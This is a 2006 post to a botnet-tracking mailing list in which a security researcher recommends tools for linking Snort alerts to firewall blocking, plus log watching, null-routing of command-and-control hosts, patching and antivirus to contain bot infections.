Re: [botnets] bot traffic found by IDS

Tue, 13 Jun 2006 07:59:07 -0700 

To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
On Tue, 13 Jun 2006, dan wrote:

> I was curious how many people on the list are using active response 
> systems for their IDS installations. If so, which ones?

since you said that you're using snort, i don't know if you have linux 
firewalling enabled or not, but if so:

        http://www.stearns.org/snort2iptables/

if you're using openbsd+pf, check out snort2c:

        http://snort2c.sourceforge.net/

or snort2pf:

        http://www.thinknerd.org/~ssc/wiki/doku.php?id=snort2pf

there are also plugins for Checkpoint SAM integration (snortsam). and also 
snort-inline (in IPS mode).

in short, lots of ways to block known offending hosts with snort. just 
make sure that youre ruleset is up to snuff.

you may also want to mix it with something to watch your SSH logs to track 
brute forcing attempts (and insert the appropriate FW rules) and also your 
apache access attempts (ie to stop those mambo attempts).

also, if you're worried about bots getting OUT of your network once 
they've attacked, you can look at things like null routing if you can get 
a list of known botnets and have them updated frequently enough, or you 
can also firewall the destination hosts. this would block the bot from 
successfully getting to the C&C server; it wont block the bot's 
propagation attempts. clearly, keeping up to date on patches and auditing 
for NULL or weak passwords will stop most bot propagations; it wont stop 
the Trojan horse infection vector, though. keep your AV up to date and 
you'll track most malware (but, i do have to admit, most of the bots i 
catch and analyze are poorly detected by AV, if at all).

hope this helps,

________
jose nazario, ph.d.                 [EMAIL PROTECTED]
http://monkey.org/~jose/            http://monkey.org/~jose/secnews.html
                                    http://www.wormblog.com/
_______________________________________________
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement 
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets

Reply via email to